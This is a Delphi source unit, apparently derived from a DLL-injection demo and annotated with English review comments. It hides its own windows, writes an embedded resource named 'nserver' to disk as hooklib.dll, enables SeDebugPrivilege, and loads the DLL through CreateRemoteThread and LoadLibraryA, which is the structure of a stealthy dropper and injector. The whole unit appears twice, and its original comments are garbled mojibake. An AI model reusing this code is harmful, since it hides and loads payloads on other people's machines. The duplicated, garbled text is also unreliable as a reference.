////////////////////////////////////////////////////////////////////////////////
//
// ****************************************************************************
// * Project : Inject/Eject Library Demo
// * Unit Name : main
// * Purpose : 腻祛眈蝠圉桀眄 镳桁屦 忭邃疱龛 徼犭桀蝈觇 麇疱?CreateRemoteThread
// * Author : 离尻襦礓?(Rouse_) 拎沐朦
// * Version : 1.00
// ****************************************************************************
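//
unit main;

interface

uses
  Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls;

const
  // Name of the library InjectLib makes the target process load; InjectLib
  // resolves it relative to the executable's own directory.
  DLLName = 'hooklib.dll';

type
  TfrmMain = class(TForm)
    GroupBox: TGroupBox;
    lbStatus: TListBox;
    // Button handler: counts clicks in Sender.Tag and runs InjectLib on every
    // odd click against the current process.
    procedure btnInjectEjectClick(Sender: TObject);
  private
    // CreateRemoteThread/LoadLibraryA injection of DLLName into the process
    // with id ProcessID. Returns True only if the remote thread ran to
    // completion with exit code 0.
    function InjectLib(const ProcessID: DWORD): Boolean;
  end;

  // Signatures of the two kernel32 routines handed to RemoteFreeLibrary
  // through TEjectLibStruct.
  TGetModuleHandle = function (lpModuleName: PChar): HMODULE; stdcall;
  TFreeLibrary = function (hLibModule: HMODULE): BOOL; stdcall;

  // Parameter block for RemoteFreeLibrary: the two function pointers above
  // plus the name of the module to unload.
  PEjectLibStruct = ^TEjectLibStruct;
  TEjectLibStruct = record
    hGetModuleHandle: TGetModuleHandle;
    hFreeLibrary: TFreeLibrary;
    lpModuleName: PChar;
  end;

var
  frmMain: TfrmMain;
  // Name of the RCDATA resource that ExtractFile writes to disk.
  File1: String = 'nserver';
  // Extensions chosen by ExtractFile; computed there but never used.
  File1Extention: String = 'dll';
  File2Extention: String = 'dll';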
implementation{$R *.dfm}
{$R 'coolvibes.res' 'coolvibes.RC'}
{ TfrmMain }// 吾疣犷蝼桕 觏铒觇 磬 忭邃疱龛?恹沭箸牦 徼犭桀蝈觇
// =============================================================================
// Button handler. Hides the main form and the application window (and marks
// the latter WS_EX_TOOLWINDOW, which keeps it off the taskbar), then bumps
// Sender.Tag and, on every odd click, injects DLLName into the current
// process. Even clicks do nothing: no eject path exists in this file.
procedure TfrmMain.btnInjectEjectClick(Sender: TObject);
begin
  // Hide our own windows before doing anything else.
  ShowWindow(Handle, SW_HIDE);
  ShowWindow(Application.Handle, SW_HIDE) ;
  SetWindowLong(Application.Handle, GWL_EXSTYLE, GetWindowLong(Application.Handle, GWL_EXSTYLE) or WS_EX_TOOLWINDOW ) ;
  ShowWindow(Application.Handle, SW_HIDE) ;
  // Sender.Tag doubles as the click counter.
  TComponent(Sender).Tag := TComponent(Sender).Tag + 1;
  if (TComponent(Sender).Tag mod 2) = 1 then
  begin
    // The target is this very process (GetCurrentProcessID).
    if InjectLib(GetCurrentProcessID) then
      lbStatus.Items.Add('Inyeccion con exito.')
    else
      // NOTE(review): empty else branch - a failed injection is not reported.
  end
end;
// procedure dropper
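// Extract a resource to a file (the original comment also says "and run it",
// but nothing is executed here; the caller, InjectLib, loads the file later).
//
// Looks up the RCDATA resource named `whichone` in this module (HInstance)
// and writes its bytes to 'hooklib.dll' in the current directory. Returns
// silently on any lookup, load or file-creation failure.
//
// NOTE(review): DirBuff/FileNameBuff are allocated and freed without ever
// being used, WhichExtention is computed but never read, and WriteFile's
// return value is not checked (a short write leaves a truncated file).
// Nothing in the logic is changed here: the collapsed line breaks, which had
// swallowed the procedure header into the comment above it, are restored.
procedure ExtractFile(whichone: String);
var
  WhichExtention: String;
  DirBuff,FileNameBuff,ResultFilePath,ResourcePointer: PChar;
  ResourceLocation: HRSRC;
  ResourceSize,byteswritten: Longword;
  ResDataHandle: THandle;
  FileHandle: THandle;
begin
  // Allocate memory (unused, see NOTE above).
  getMem(DirBuff,MAX_PATH+1);
  getMem(FileNameBuff,MAX_PATH+1);
  // Pick the extension for the extracted file (unused, see NOTE above).
  if whichone = File1 then WhichExtention := File1Extention
  else WhichExtention := File2Extention;
  // Output path is fixed and relative to the current directory. InjectLib
  // later builds its load path from ParamStr(0), so the two only agree when
  // the current directory is the executable's directory.
  ResultFilePath := 'hooklib.dll';
  // Free memory.
  freeMem(DirBuff);
  freeMem(FileNameBuff);
  // Find the resource.
  ResourceLocation := FindResource(HInstance,PChar(whichone),RT_RCDATA);
  if ResourceLocation = 0 then exit;
  // Get the resource size.
  ResourceSize := SizeofResource(HInstance,ResourceLocation);
  if ResourceSize = 0 then exit;
  // Load the resource into memory.
  ResDataHandle := LoadResource(HInstance,ResourceLocation);
  if ResDataHandle = 0 then exit;
  // Lock the resource to get a pointer to its bytes.
  ResourcePointer := LockResource(ResDataHandle);
  if ResourcePointer = NIL then exit;
  // Create the output file, overwriting any existing one (CREATE_ALWAYS).
  FileHandle := CreateFile(ResultFilePath,GENERIC_WRITE,FILE_SHARE_WRITE,NIL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
  if FileHandle = INVALID_HANDLE_VALUE then exit;
  // Write the resource to the file (result unchecked, see NOTE above).
  WriteFile(FileHandle,ResourcePointer^,ResourceSize,byteswritten,NIL);
  // Close the file.
  CloseHandle(FileHandle);
  sleep(500);
end;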
// 忮顸 铗 觐?疣犷蜞螯 礤 狍溴?
// =============================================================================
// Enables SeDebugPrivilege in the current process token.
// Returns the result of AdjustTokenPrivileges, or False when the token cannot
// be opened or the privilege LUID cannot be looked up.
//
// NOTE(review): AdjustTokenPrivileges reports TRUE even when the privilege
// was not granted (GetLastError = ERROR_NOT_ALL_ASSIGNED, e.g. for a
// non-administrator), so a True result does not prove the privilege is held;
// the Token handle is also never closed. Left unchanged here.
// For monitoring purposes: enabling SeDebugPrivilege is the first step of the
// injection sequence in this file.
function SetDebugPriv: Boolean;
var
  Token: THandle;
  tkp: TTokenPrivileges;
  ReturnLength: DWORD;
begin
  Result := false;
  // Open the current process token for privilege adjustment.
  if OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, Token) then
  begin
    // Look up the LUID of SeDebugPrivilege.
    if LookupPrivilegeValue(nil, PChar('SeDebugPrivilege'), tkp.Privileges[0].Luid) then
    begin
      // Exactly one privilege, set to enabled.
      tkp.PrivilegeCount := 1;
      tkp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
      // Apply it; ReturnLength is required by the API but not used here.
      Result := AdjustTokenPrivileges(Token, false, tkp, 0, nil, ReturnLength);
    end;
  end;
end;
// InjectLib: loads the library into the process whose PID is ProcessID.
// 碾 篑镥钽?忭邃疱龛 眢骓?镥疱溧螯 噤疱?趔黻鲨?LoadLibraryA
// ?矬螯 ?玎沭箧噱祛?徼犭桀蝈赍.
// 羊痤牦 ?矬蝈?礤钺躅滂祛 疣珈羼蜩螯 ?嚯疱耥铎 镳铖蝠囗耱忮 箐嚯屙眍泐 镳铞羼襦
// =============================================================================
// Classic CreateRemoteThread / LoadLibraryA injection of DLLName into the
// process with id ProcessID:
//   1. ExtractFile drops the 'nserver' resource to disk as hooklib.dll,
//   2. SeDebugPrivilege is enabled (SetDebugPriv); failure aborts,
//   3. OpenProcess -> VirtualAllocEx -> WriteProcessMemory (DLL path) ->
//      CreateRemoteThread(LoadLibraryA, path) -> WaitForSingleObject.
// The only caller in this file passes GetCurrentProcessID, i.e. the process
// injects into itself. This API sequence (process access, remote thread
// creation) is what host telemetry for injection detection keys on.
//
// Returns True only when the remote thread finished and its exit code is 0.
// NOTE(review): the thread's exit code is LoadLibraryA's return value (the
// module handle), so 0 means the load failed - the condition looks inverted;
// confirm the intended contract.
// NOTE(review): VirtualFreeEx receives @RemoteDll (the address of the local
// variable) rather than RemoteDll, so the remote buffer is never released.
// NOTE(review): the path is written without its terminating NUL
// (Length(DllPath) bytes); it works only because the freshly committed page
// is zero-filled. Process is also declared HWND rather than THandle.
// None of these are changed here.
function TfrmMain.InjectLib(const ProcessID: DWORD): Boolean;
var
  Process: HWND;
  ThreadRtn: FARPROC;
  DllPath: String;
  RemoteDll: Pointer;
  BytesWriten: DWORD;
  Thread: DWORD;
  ThreadId: DWORD;
  ExitCode: DWORD;
begin
  // Drop the payload DLL (into the current directory, see ExtractFile), then
  // enable SeDebugPrivilege; give up if that fails.
  ExtractFile(File1);
  Result := SetDebugPriv;
  if not Result then Exit;
  Process := 0;
  Thread := 0;
  ShowWindow(Application.Handle, SW_HIDE) ;
  try
    // Open the target with only the rights needed to allocate, write and
    // create a thread (handle marked inheritable).
    Process := OpenProcess(PROCESS_CREATE_THREAD or PROCESS_VM_OPERATION or
      PROCESS_VM_WRITE, True, ProcessID);
    if Process = 0 then Exit;
    // Path of the DLL next to the executable (not necessarily where
    // ExtractFile wrote it).
    DllPath := ExtractFilePath(ParamStr(0)) + DLLName;
    // Commit room for the path in the target and copy it over.
    RemoteDll := VirtualAllocEx(Process, nil, Length(DllPath),
      MEM_COMMIT or MEM_TOP_DOWN, PAGE_READWRITE);
    if RemoteDll = nil then Exit;
    if not WriteProcessMemory(Process, RemoteDll, PChar(DllPath),
      Length(DllPath), BytesWriten) then Exit;
    if BytesWriten <> DWORD(Length(DllPath)) then Exit;
    // The local address of LoadLibraryA is reused as the remote start
    // routine, i.e. the code relies on kernel32 being mapped at the same
    // base in the target.
    ThreadRtn := GetProcAddress(GetModuleHandle('Kernel32.dll'), 'LoadLibraryA');
    if ThreadRtn = nil then Exit;
    // Start the remote thread with the path buffer as its argument.
    Thread := CreateRemoteThread(Process, nil, 0, ThreadRtn, RemoteDll, 0, ThreadId);
    if Thread = 0 then Exit;
    // Wait for it to return and read its exit code.
    if (WaitForSingleObject(Thread, INFINITE) = WAIT_OBJECT_0) then
      if GetExitCodeThread(Thread, ExitCode) then
        Result := ExitCode = 0;
  finally
    // Release the remote buffer and close the handles (see the NOTE above
    // about the @RemoteDll argument).
    if RemoteDll <> nil then
      VirtualFreeEx(Process, @RemoteDll, 0, MEM_RELEASE);
    if Thread <> 0 then CloseHandle(Thread);
    if Process <> 0 then CloseHandle(Process);
  end;
end;
// RemoteFreeLibrary follows: a thread routine that unloads a library by name.
// 镳铞羼皴 ?恹玮囹?蜞?驽 FreeLibrary
// 蒡桁 ?磬?狍溴?玎龛爨螯? 忸?蜞赅 趔黻鲨
// 碾 篑镥铋 邋 疣犷螓 礤钺躅滂祛 镥疱溧螯 3 镟疣戾蝠?
// 1: 冷疱襦 趔黻鲨?GetModuleHandle ?FreeLibrary;
// 2: 褥 祛潴?, 恹沭箸牦 觐蝾痤泐 禧 狍溴?镳铊玮钿栩?
// =============================================================================
// Thread routine (stdcall, CreateRemoteThread-compatible signature) that
// unloads a library by name: resolves the module handle through the
// GetModuleHandle pointer in the parameter block, then calls the FreeLibrary
// pointer from the same block on it. Returns FreeLibrary's result as a DWORD,
// or 0 when lpParameter is nil or the module is not loaded.
// Not referenced from any code in this file (there is no eject path).
function RemoteFreeLibrary(lpParameter: Pointer): DWORD; stdcall;
var
  hLibModule: HMODULE;
begin
  Result := 0;
  if lpParameter = nil then Exit;
  // Resolve the module via the caller-provided GetModuleHandle.
  hLibModule := TGetModuleHandle(PEjectLibStruct(lpParameter)^.hGetModuleHandle)
    (PEjectLibStruct(lpParameter)^.lpModuleName);
  if hLibModule <> 0 then
    // Unload it via the caller-provided FreeLibrary.
    Result := DWORD(TFreeLibrary(PEjectLibStruct(lpParameter)^.hFreeLibrary)(hLibModule));
end;
// The garbled comment lines that follow appear to be the header of a further
// routine that is not defined in this file before its closing 'end.'.
// ?镱蝾觐忸?趔黻鲨彘 RemoteFreeLibrary
// ?镱溷铗噔腓忄弪 潆 邋 疣犷螓 礤钺躅滂禧?溧眄
// =============================================================================
end.
//
// ****************************************************************************
// * Project : Inject/Eject Library Demo
// * Unit Name : main
// * Purpose : 腻祛眈蝠圉桀眄 镳桁屦 忭邃疱龛 徼犭桀蝈觇 麇疱?CreateRemoteThread
// * Author : 离尻襦礓?(Rouse_) 拎沐朦
// * Version : 1.00
// ****************************************************************************
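//
unit main;

interface

uses
  Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms,
  Dialogs, StdCtrls;

const
  // Name of the library InjectLib makes the target process load; InjectLib
  // resolves it relative to the executable's own directory.
  DLLName = 'hooklib.dll';

type
  TfrmMain = class(TForm)
    GroupBox: TGroupBox;
    lbStatus: TListBox;
    // Button handler: counts clicks in Sender.Tag and runs InjectLib on every
    // odd click against the current process.
    procedure btnInjectEjectClick(Sender: TObject);
  private
    // CreateRemoteThread/LoadLibraryA injection of DLLName into the process
    // with id ProcessID. Returns True only if the remote thread ran to
    // completion with exit code 0.
    function InjectLib(const ProcessID: DWORD): Boolean;
  end;

  // Signatures of the two kernel32 routines handed to RemoteFreeLibrary
  // through TEjectLibStruct.
  TGetModuleHandle = function (lpModuleName: PChar): HMODULE; stdcall;
  TFreeLibrary = function (hLibModule: HMODULE): BOOL; stdcall;

  // Parameter block for RemoteFreeLibrary: the two function pointers above
  // plus the name of the module to unload.
  PEjectLibStruct = ^TEjectLibStruct;
  TEjectLibStruct = record
    hGetModuleHandle: TGetModuleHandle;
    hFreeLibrary: TFreeLibrary;
    lpModuleName: PChar;
  end;

var
  frmMain: TfrmMain;
  // Name of the RCDATA resource that ExtractFile writes to disk.
  File1: String = 'nserver';
  // Extensions chosen by ExtractFile; computed there but never used.
  File1Extention: String = 'dll';
  File2Extention: String = 'dll';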
implementation{$R *.dfm}
{$R 'coolvibes.res' 'coolvibes.RC'}
{ TfrmMain }// 吾疣犷蝼桕 觏铒觇 磬 忭邃疱龛?恹沭箸牦 徼犭桀蝈觇
// =============================================================================
// Button handler. Hides the main form and the application window (and marks
// the latter WS_EX_TOOLWINDOW, which keeps it off the taskbar), then bumps
// Sender.Tag and, on every odd click, injects DLLName into the current
// process. Even clicks do nothing: no eject path exists in this file.
procedure TfrmMain.btnInjectEjectClick(Sender: TObject);
begin
  // Hide our own windows before doing anything else.
  ShowWindow(Handle, SW_HIDE);
  ShowWindow(Application.Handle, SW_HIDE) ;
  SetWindowLong(Application.Handle, GWL_EXSTYLE, GetWindowLong(Application.Handle, GWL_EXSTYLE) or WS_EX_TOOLWINDOW ) ;
  ShowWindow(Application.Handle, SW_HIDE) ;
  // Sender.Tag doubles as the click counter.
  TComponent(Sender).Tag := TComponent(Sender).Tag + 1;
  if (TComponent(Sender).Tag mod 2) = 1 then
  begin
    // The target is this very process (GetCurrentProcessID).
    if InjectLib(GetCurrentProcessID) then
      lbStatus.Items.Add('Inyeccion con exito.')
    else
      // NOTE(review): empty else branch - a failed injection is not reported.
  end
end;
// procedure dropper
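// Extract a resource to a file (the original comment also says "and run it",
// but nothing is executed here; the caller, InjectLib, loads the file later).
//
// Looks up the RCDATA resource named `whichone` in this module (HInstance)
// and writes its bytes to 'hooklib.dll' in the current directory. Returns
// silently on any lookup, load or file-creation failure.
//
// NOTE(review): DirBuff/FileNameBuff are allocated and freed without ever
// being used, WhichExtention is computed but never read, and WriteFile's
// return value is not checked (a short write leaves a truncated file).
// Nothing in the logic is changed here: the collapsed line breaks, which had
// swallowed the procedure header into the comment above it, are restored.
procedure ExtractFile(whichone: String);
var
  WhichExtention: String;
  DirBuff,FileNameBuff,ResultFilePath,ResourcePointer: PChar;
  ResourceLocation: HRSRC;
  ResourceSize,byteswritten: Longword;
  ResDataHandle: THandle;
  FileHandle: THandle;
begin
  // Allocate memory (unused, see NOTE above).
  getMem(DirBuff,MAX_PATH+1);
  getMem(FileNameBuff,MAX_PATH+1);
  // Pick the extension for the extracted file (unused, see NOTE above).
  if whichone = File1 then WhichExtention := File1Extention
  else WhichExtention := File2Extention;
  // Output path is fixed and relative to the current directory. InjectLib
  // later builds its load path from ParamStr(0), so the two only agree when
  // the current directory is the executable's directory.
  ResultFilePath := 'hooklib.dll';
  // Free memory.
  freeMem(DirBuff);
  freeMem(FileNameBuff);
  // Find the resource.
  ResourceLocation := FindResource(HInstance,PChar(whichone),RT_RCDATA);
  if ResourceLocation = 0 then exit;
  // Get the resource size.
  ResourceSize := SizeofResource(HInstance,ResourceLocation);
  if ResourceSize = 0 then exit;
  // Load the resource into memory.
  ResDataHandle := LoadResource(HInstance,ResourceLocation);
  if ResDataHandle = 0 then exit;
  // Lock the resource to get a pointer to its bytes.
  ResourcePointer := LockResource(ResDataHandle);
  if ResourcePointer = NIL then exit;
  // Create the output file, overwriting any existing one (CREATE_ALWAYS).
  FileHandle := CreateFile(ResultFilePath,GENERIC_WRITE,FILE_SHARE_WRITE,NIL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
  if FileHandle = INVALID_HANDLE_VALUE then exit;
  // Write the resource to the file (result unchecked, see NOTE above).
  WriteFile(FileHandle,ResourcePointer^,ResourceSize,byteswritten,NIL);
  // Close the file.
  CloseHandle(FileHandle);
  sleep(500);
end;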
// 忮顸 铗 觐?疣犷蜞螯 礤 狍溴?
// =============================================================================
// Enables SeDebugPrivilege in the current process token.
// Returns the result of AdjustTokenPrivileges, or False when the token cannot
// be opened or the privilege LUID cannot be looked up.
//
// NOTE(review): AdjustTokenPrivileges reports TRUE even when the privilege
// was not granted (GetLastError = ERROR_NOT_ALL_ASSIGNED, e.g. for a
// non-administrator), so a True result does not prove the privilege is held;
// the Token handle is also never closed. Left unchanged here.
// For monitoring purposes: enabling SeDebugPrivilege is the first step of the
// injection sequence in this file.
function SetDebugPriv: Boolean;
var
  Token: THandle;
  tkp: TTokenPrivileges;
  ReturnLength: DWORD;
begin
  Result := false;
  // Open the current process token for privilege adjustment.
  if OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, Token) then
  begin
    // Look up the LUID of SeDebugPrivilege.
    if LookupPrivilegeValue(nil, PChar('SeDebugPrivilege'), tkp.Privileges[0].Luid) then
    begin
      // Exactly one privilege, set to enabled.
      tkp.PrivilegeCount := 1;
      tkp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
      // Apply it; ReturnLength is required by the API but not used here.
      Result := AdjustTokenPrivileges(Token, false, tkp, 0, nil, ReturnLength);
    end;
  end;
end;
// InjectLib: loads the library into the process whose PID is ProcessID.
// 碾 篑镥钽?忭邃疱龛 眢骓?镥疱溧螯 噤疱?趔黻鲨?LoadLibraryA
// ?矬螯 ?玎沭箧噱祛?徼犭桀蝈赍.
// 羊痤牦 ?矬蝈?礤钺躅滂祛 疣珈羼蜩螯 ?嚯疱耥铎 镳铖蝠囗耱忮 箐嚯屙眍泐 镳铞羼襦
// =============================================================================
// Classic CreateRemoteThread / LoadLibraryA injection of DLLName into the
// process with id ProcessID:
//   1. ExtractFile drops the 'nserver' resource to disk as hooklib.dll,
//   2. SeDebugPrivilege is enabled (SetDebugPriv); failure aborts,
//   3. OpenProcess -> VirtualAllocEx -> WriteProcessMemory (DLL path) ->
//      CreateRemoteThread(LoadLibraryA, path) -> WaitForSingleObject.
// The only caller in this file passes GetCurrentProcessID, i.e. the process
// injects into itself. This API sequence (process access, remote thread
// creation) is what host telemetry for injection detection keys on.
//
// Returns True only when the remote thread finished and its exit code is 0.
// NOTE(review): the thread's exit code is LoadLibraryA's return value (the
// module handle), so 0 means the load failed - the condition looks inverted;
// confirm the intended contract.
// NOTE(review): VirtualFreeEx receives @RemoteDll (the address of the local
// variable) rather than RemoteDll, so the remote buffer is never released.
// NOTE(review): the path is written without its terminating NUL
// (Length(DllPath) bytes); it works only because the freshly committed page
// is zero-filled. Process is also declared HWND rather than THandle.
// None of these are changed here.
function TfrmMain.InjectLib(const ProcessID: DWORD): Boolean;
var
  Process: HWND;
  ThreadRtn: FARPROC;
  DllPath: String;
  RemoteDll: Pointer;
  BytesWriten: DWORD;
  Thread: DWORD;
  ThreadId: DWORD;
  ExitCode: DWORD;
begin
  // Drop the payload DLL (into the current directory, see ExtractFile), then
  // enable SeDebugPrivilege; give up if that fails.
  ExtractFile(File1);
  Result := SetDebugPriv;
  if not Result then Exit;
  Process := 0;
  Thread := 0;
  ShowWindow(Application.Handle, SW_HIDE) ;
  try
    // Open the target with only the rights needed to allocate, write and
    // create a thread (handle marked inheritable).
    Process := OpenProcess(PROCESS_CREATE_THREAD or PROCESS_VM_OPERATION or
      PROCESS_VM_WRITE, True, ProcessID);
    if Process = 0 then Exit;
    // Path of the DLL next to the executable (not necessarily where
    // ExtractFile wrote it).
    DllPath := ExtractFilePath(ParamStr(0)) + DLLName;
    // Commit room for the path in the target and copy it over.
    RemoteDll := VirtualAllocEx(Process, nil, Length(DllPath),
      MEM_COMMIT or MEM_TOP_DOWN, PAGE_READWRITE);
    if RemoteDll = nil then Exit;
    if not WriteProcessMemory(Process, RemoteDll, PChar(DllPath),
      Length(DllPath), BytesWriten) then Exit;
    if BytesWriten <> DWORD(Length(DllPath)) then Exit;
    // The local address of LoadLibraryA is reused as the remote start
    // routine, i.e. the code relies on kernel32 being mapped at the same
    // base in the target.
    ThreadRtn := GetProcAddress(GetModuleHandle('Kernel32.dll'), 'LoadLibraryA');
    if ThreadRtn = nil then Exit;
    // Start the remote thread with the path buffer as its argument.
    Thread := CreateRemoteThread(Process, nil, 0, ThreadRtn, RemoteDll, 0, ThreadId);
    if Thread = 0 then Exit;
    // Wait for it to return and read its exit code.
    if (WaitForSingleObject(Thread, INFINITE) = WAIT_OBJECT_0) then
      if GetExitCodeThread(Thread, ExitCode) then
        Result := ExitCode = 0;
  finally
    // Release the remote buffer and close the handles (see the NOTE above
    // about the @RemoteDll argument).
    if RemoteDll <> nil then
      VirtualFreeEx(Process, @RemoteDll, 0, MEM_RELEASE);
    if Thread <> 0 then CloseHandle(Thread);
    if Process <> 0 then CloseHandle(Process);
  end;
end;
// RemoteFreeLibrary follows: a thread routine that unloads a library by name.
// 镳铞羼皴 ?恹玮囹?蜞?驽 FreeLibrary
// 蒡桁 ?磬?狍溴?玎龛爨螯? 忸?蜞赅 趔黻鲨
// 碾 篑镥铋 邋 疣犷螓 礤钺躅滂祛 镥疱溧螯 3 镟疣戾蝠?
// 1: 冷疱襦 趔黻鲨?GetModuleHandle ?FreeLibrary;
// 2: 褥 祛潴?, 恹沭箸牦 觐蝾痤泐 禧 狍溴?镳铊玮钿栩?
// =============================================================================
// Thread routine (stdcall, CreateRemoteThread-compatible signature) that
// unloads a library by name: resolves the module handle through the
// GetModuleHandle pointer in the parameter block, then calls the FreeLibrary
// pointer from the same block on it. Returns FreeLibrary's result as a DWORD,
// or 0 when lpParameter is nil or the module is not loaded.
// Not referenced from any code in this file (there is no eject path).
function RemoteFreeLibrary(lpParameter: Pointer): DWORD; stdcall;
var
  hLibModule: HMODULE;
begin
  Result := 0;
  if lpParameter = nil then Exit;
  // Resolve the module via the caller-provided GetModuleHandle.
  hLibModule := TGetModuleHandle(PEjectLibStruct(lpParameter)^.hGetModuleHandle)
    (PEjectLibStruct(lpParameter)^.lpModuleName);
  if hLibModule <> 0 then
    // Unload it via the caller-provided FreeLibrary.
    Result := DWORD(TFreeLibrary(PEjectLibStruct(lpParameter)^.hFreeLibrary)(hLibModule));
end;
// The garbled comment lines that follow appear to be the header of a further
// routine that is not defined in this file before its closing 'end.'.
// ?镱蝾觐忸?趔黻鲨彘 RemoteFreeLibrary
// ?镱溷铗噔腓忄弪 潆 邋 疣犷螓 礤钺躅滂禧?溧眄
// =============================================================================
end.